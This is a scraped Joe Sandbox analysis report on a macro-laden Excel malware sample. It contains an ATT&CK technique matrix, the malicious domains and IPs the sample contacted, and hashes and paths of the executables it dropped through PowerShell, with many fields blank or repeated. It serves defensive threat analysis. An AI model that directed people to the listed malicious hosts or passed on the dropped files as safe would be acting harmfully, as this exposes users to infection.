Replication Through Removable Media | Launchd | Rc.common | Rc.common | Valid Accounts1 | Cached Domain Credentials | Virtualization/Sandbox Evasion2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Modify Registry1 | DCSync | Process Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion2 | Proc Filesystem | System Owner/User Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Access Token Manipulation11 | /etc/passwd and /etc/shadow | Remote System Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection311 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Hidden Files and Directories1 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML | |||
100% | Joe Sandbox ML | |||
0% | Metadefender | Browse | ||
0% | ReversingLabs |
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | TR/Crypt.XPACK.Gen | Download File | ||
100% | Avira | TR/Crypt.XPACK.Gen | Download File |
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
cutt.ly | 104.22.0.232 | true | true | unknown | |
bighoreca.nl | 83.172.144.37 | true | true | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| low | ||
false |
| unknown | ||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
false |
| unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
83.172.144.37 | unknown | Netherlands | 25459 | NEDZONE-ASNL | true | |
104.22.0.232 | unknown | United States | 13335 | CLOUDFLARENETUS | true | |
185.206.215.56 | unknown | Ukraine | 204601 | ON-LINE-DATAServerlocation-NetherlandsDrontenNL | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Red Diamond |
Analysis ID: | 336301 |
Start date: | 05.01.2021 |
Start time: | 19:04:25 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 10m 12s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | 6Cprm97UTl (renamed file extension from none to xls) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 21 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.spyw.expl.evad.winXLS@27/18@2/3 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
19:04:41 | API Interceptor | |
19:05:09 | API Interceptor | |
19:05:15 | Autostart | |
19:05:22 | API Interceptor | |
19:05:23 | Autostart | |
19:05:29 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
104.22.0.232 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
cutt.ly | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
NEDZONE-ASNL | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
ON-LINE-DATAServerlocation-NetherlandsDrontenNL | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
05af1f5ca1b87cc9cc9b25185115607d | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Temp\RegAsm.exe | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Created / dropped Files |
---|
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 3.1086014193077407 |
Encrypted: | false |
SSDEEP: | 6:kKlawwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:N1kPlE99SNxAhUegeT2 |
MD5: | 89A188366EFFB46949AD9093EDA55CF1 |
SHA1: | 6F3931CD5BA324C598AE0B45F7A1EA387E7DD1F2 |
SHA-256: | 9FBCA6A1EEDBC56E0350C4D21F36077F429AE6452F579A3864D44D11AD49A909 |
SHA-512: | F964D8C36C44119D49191DD1CD2D990D8EE87FC5EEDB9042CD8839100CCDA240ECC054FE1172A8E487569D4EFC5DDE439A2234E992DB0373AE34AD88FE98411E |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 105034 |
Entropy (8bit): | 7.925151112906241 |
Encrypted: | false |
SSDEEP: | 3072:nda1iLoxgaSNUPZlsaFPOHYiR+rJEgjjajH7cA:nGiE/SN0ZltFPgY9rvgp |
MD5: | 2A97A372C7AC14DDAF2BC6CECA6BCDE8 |
SHA1: | 6509EB9A038444C7CD44BF03B7B6536CCEBB73F0 |
SHA-256: | DBC762A96077FDB3858F84F2642813C5CAA88A1B41FFEB34C1FD5BAB9F6F2D9D |
SHA-512: | 0EC40FBAB270674794C191A66EAC1FD609D9D264EE7A835B34F61A63ABA2687E2E8B83B23FD83C409050C6072473F7AFEC4FB521CD327D2F00DD9A42531B3A45 |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Preview: |
|
Process: | C:\Users\user\ntrwe.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64672 |
Entropy (8bit): | 6.033474133573561 |
Encrypted: | false |
SSDEEP: | 768:PedoViadPL1DI9WzutSjeJan8dBhF541kE6Iq8HaVxlYDKz4yqibwEBbr:XiaFJkobMa8dBXG2zbVUDKz4yq3EBbr |
MD5: | ADF76F395D5A0ECBBF005390B73C3FD2 |
SHA1: | 017801B7EBD2CC0E1151EEBEC14630DBAEE48229 |
SHA-256: | 5FF87E563B2DF09E94E17C82741D9A43AED2F214643DC067232916FAE4B35417 |
SHA-512: | 9670AC5A10719FA312336B790EAD713D78A9999DB236AD0841A32CD689559B9F5F8469E3AF93400F1BE5BAF2B3723574F16EA554C2AAF638734FFF806F18DB2B |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
|
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 152533 |
Entropy (8bit): | 6.31602258454967 |
Encrypted: | false |
SSDEEP: | 1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA |
MD5: | D0682A3C344DFC62FB18D5A539F81F61 |
SHA1: | 09D3E9B899785DA377DF2518C6175D70CCF9DA33 |
SHA-256: | 4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A |
SHA-512: | 0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3 |
Malicious: | false |
Preview: |
|
Process: | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
|
Process: | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 35006 |
Entropy (8bit): | 0.6024827961083986 |
Encrypted: | false |
SSDEEP: | 12:seeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeR:i |
MD5: | AD0D2FB7F4EC355D0D8CBF5C9235259B |
SHA1: | C875BB3B2020FB4A1C8E6E694BA2296EBB31DF81 |
SHA-256: | 2598083577FF245674401A33AE940D5AE389E972B1DBB147FAA47B40156D965E |
SHA-512: | E345C2920A6F29AE14EA6181178E3F4252B20CFF01374BA47CB7A4EE80FFA749E424345D9AB03905A8818E6DE1A03917499C409DBB6DAA1D3EB3340C4AA68E9E |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2028 |
Entropy (8bit): | 4.547448419157985 |
Encrypted: | false |
SSDEEP: | 24:8hz//o/XTr6N47KevRDv3qpdM7dD2hz//o/XTr6N47KevRDv3qpdM7dV:8hz/A/XT+NhtpQh2hz/A/XT+NhtpQ/ |
MD5: | 73C3A39789CB2C2692EF7B7D1BE021AF |
SHA1: | 9B6DCC9611BABA41FE6CC83D220EEEA88E69B346 |
SHA-256: | F01B6D9921D1A2744419D9283E221C129FAEF7C40CB5EC09BB47D9BE6BC2992C |
SHA-512: | 82003A9023EC05876BE86D273E1975488B2D62F6F0A96B39C9C358B3A98492AF2DECF7F82967C0E5BC60B1A948C88FFB0AD1DCEF49B4C7E932616065ED763196 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.493703650549725 |
Encrypted: | false |
SSDEEP: | 12:85QSxCLgXg/XAlCPCHaX7B8NB/0VngUX+WnicvbWbDtZ3YilMMEpxRljK96TdJP8:85VxU/XTr6NqgUYeeDv3qprNru/ |
MD5: | 6998A322A53314E59F4908073525B31A |
SHA1: | F6A12ABF5E811E73424968267E355D9FE3FBB930 |
SHA-256: | E2F9EF677017D5ED6785546BAFA65854E49111D370873CD60BD34ED2DE4A3496 |
SHA-512: | 9348C3E08429E03CAF5FD09B36DC46651958D817A4AA5D94C3602CC60E2A6214200D1302062D64296EF2CE41F98F29D4F2AA8F5863597AEF2C74E003AF21706E |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 83 |
Entropy (8bit): | 4.598856563846179 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMLOxFp2SDxFp2mMLOxFp2v:dj6LOFpDFoLOFI |
MD5: | E843814B96F07781747EFD43C6082AEC |
SHA1: | C2F6049FE788D4C8B5492EA8531FB23655E52BB1 |
SHA-256: | 7D5160CFBB0EF9CF50C2AA8430F9841E1A6FDCFBA3EAE6D9BD061D0DFEBD1AD5 |
SHA-512: | BD9EC0999C17CCB13FB893D41EE45F7B1325BDDDF3AD8CC23F599889CFD48EAB515B44E71E645C3773562DD6088C0468D0BC85CE81F7BB7050454BEF4218B757 |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8016 |
Entropy (8bit): | 3.589329078025861 |
Encrypted: | false |
SSDEEP: | 96:chQCsMqaqvsqvJCwoLz8hQCsMqaqvsEHyqvJCworJz1PYXHgf8ImlUVdIu:cyzoLz8ynHnorJz1pf8IDIu |
MD5: | 21EE1956990A0AFF41BE3228CA473491 |
SHA1: | 11A3F9FF19BDECB2F40618F1DFDDDD0E3B4F048B |
SHA-256: | 6135B7117C17789ADF7FE18263D645F33F26AD38AE9AA247B058E0B34F1750C7 |
SHA-512: | 68B9AEF1DA6E4476C4EBBA78023F56B54402A4836AC8C4E4144F723B5A55A1690DC11B258FB713F27FEDE093FF62B21389F4E82064E4C2512AEDD457ADC3CAA9 |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8016 |
Entropy (8bit): | 3.589329078025861 |
Encrypted: | false |
SSDEEP: | 96:chQCsMqaqvsqvJCwoLz8hQCsMqaqvsEHyqvJCworJz1PYXHgf8ImlUVdIu:cyzoLz8ynHnorJz1pf8IDIu |
MD5: | 21EE1956990A0AFF41BE3228CA473491 |
SHA1: | 11A3F9FF19BDECB2F40618F1DFDDDD0E3B4F048B |
SHA-256: | 6135B7117C17789ADF7FE18263D645F33F26AD38AE9AA247B058E0B34F1750C7 |
SHA-512: | 68B9AEF1DA6E4476C4EBBA78023F56B54402A4836AC8C4E4144F723B5A55A1690DC11B258FB713F27FEDE093FF62B21389F4E82064E4C2512AEDD457ADC3CAA9 |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8016 |
Entropy (8bit): | 3.589329078025861 |
Encrypted: | false |
SSDEEP: | 96:chQCsMqaqvsqvJCwoLz8hQCsMqaqvsEHyqvJCworJz1PYXHgf8ImlUVdIu:cyzoLz8ynHnorJz1pf8IDIu |
MD5: | 21EE1956990A0AFF41BE3228CA473491 |
SHA1: | 11A3F9FF19BDECB2F40618F1DFDDDD0E3B4F048B |
SHA-256: | 6135B7117C17789ADF7FE18263D645F33F26AD38AE9AA247B058E0B34F1750C7 |
SHA-512: | 68B9AEF1DA6E4476C4EBBA78023F56B54402A4836AC8C4E4144F723B5A55A1690DC11B258FB713F27FEDE093FF62B21389F4E82064E4C2512AEDD457ADC3CAA9 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 152144 |
Entropy (8bit): | 7.1465330226768335 |
Encrypted: | false |
SSDEEP: | 3072:o4k3hbdlylKsgqopeJBWhZFGkE+cL2Ndhi0olgaSN4PZlsuFPOLYiR6nJE0jjavY:Lk3hbdlylKsgqopeJBWhZFVE+W2NdhiZ |
MD5: | 0873A1826881700041830C5B6254A989 |
SHA1: | 1B3A26F038342930CF0E86AC6809DE68DCBD057F |
SHA-256: | 4DB366DD1391F89E6B9628CCD197D22B3C943B41B427E6830D13F8F9508FED25 |
SHA-512: | D3FAF4AD765F429398B8FAC893ED79EB4F973C3C796BA658453D54200E5495170FF50D50FD67C30991F42E2E2A996318BFA961C5469C6836ACB7B5D534F306E9 |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 938440 |
Entropy (8bit): | 5.522147302514215 |
Encrypted: | false |
SSDEEP: | 6144:BFDg0bJ0DxvkrhDdyquS7xY+dQ7itPEodq0sz83nTMh4lT9K850MlZ1odD9ZxRXK:vZbJ1Iqh7x7tM63ghqaOgDX6paVXuV |
MD5: | 1D11ABB9DAC9B15823D1BCAD2B8B3675 |
SHA1: | CB2A4711C5F192EDBDE50229D976FCC95A5A314C |
SHA-256: | DCC94B0C8FDF6952BD3018D92C1264651D50AAA7911195BB6F9BC6B97618B191 |
SHA-512: | FC8844B5C6FACF10830188DA7BB568D70BB9A3351CBE048E96D752E65DB6650739605B95C57D9335B463FC8B7DE846677CFE390800F5D6AA9202B90A153B4064 |
Malicious: | true |
Antivirus: |
|
Preview: |
|
Process: | C:\Users\user\AppData\Local\Temp\12.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 938440 |
Entropy (8bit): | 5.522147302514215 |
Encrypted: | false |
SSDEEP: | 6144:BFDg0bJ0DxvkrhDdyquS7xY+dQ7itPEodq0sz83nTMh4lT9K850MlZ1odD9ZxRXK:vZbJ1Iqh7x7tM63ghqaOgDX6paVXuV |
MD5: | 1D11ABB9DAC9B15823D1BCAD2B8B3675 |
SHA1: | CB2A4711C5F192EDBDE50229D976FCC95A5A314C |
SHA-256: | DCC94B0C8FDF6952BD3018D92C1264651D50AAA7911195BB6F9BC6B97618B191 |
SHA-512: | FC8844B5C6FACF10830188DA7BB568D70BB9A3351CBE048E96D752E65DB6650739605B95C57D9335B463FC8B7DE846677CFE390800F5D6AA9202B90A153B4064 |
Malicious: | true |
Antivirus: |
|
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.166667516407053 |
TrID: |
|
File name: | 6Cprm97UTl.xls |
File size: | 127488 |
MD5: | 29c8b5edc30eadf757b72b0a14857903 |
SHA1: | 77d432fb96a0a453bae30107990c2c9ee0314330 |
SHA256: | a174abce368b775138c203d66fa8a3845aead2d53d87f220c58a2fe8ee7d9cf0 |
SHA512: | f3e796ac54c7f64a01aca3ea2ae9c886e11ffdbc103024f34a19fdf4c07a58756375a9b60c4635cfb0790b82339147bf975303cd5f1f1fcbe8e2650d2c85f408 |
SSDEEP: | 3072:U4k3hbdlylKsgqopeJBWhZFGkE+cL2Nd+ioo1gaSNAPZlsWFPO7YiR6PJEcjjaPY:Xk3hbdlylKsgqopeJBWhZFVE+W2Nd+id |
File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "6Cprm97UTl.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1252 |
Last Saved By: | |
Create Time: | 2020-09-20 21:17:44 |
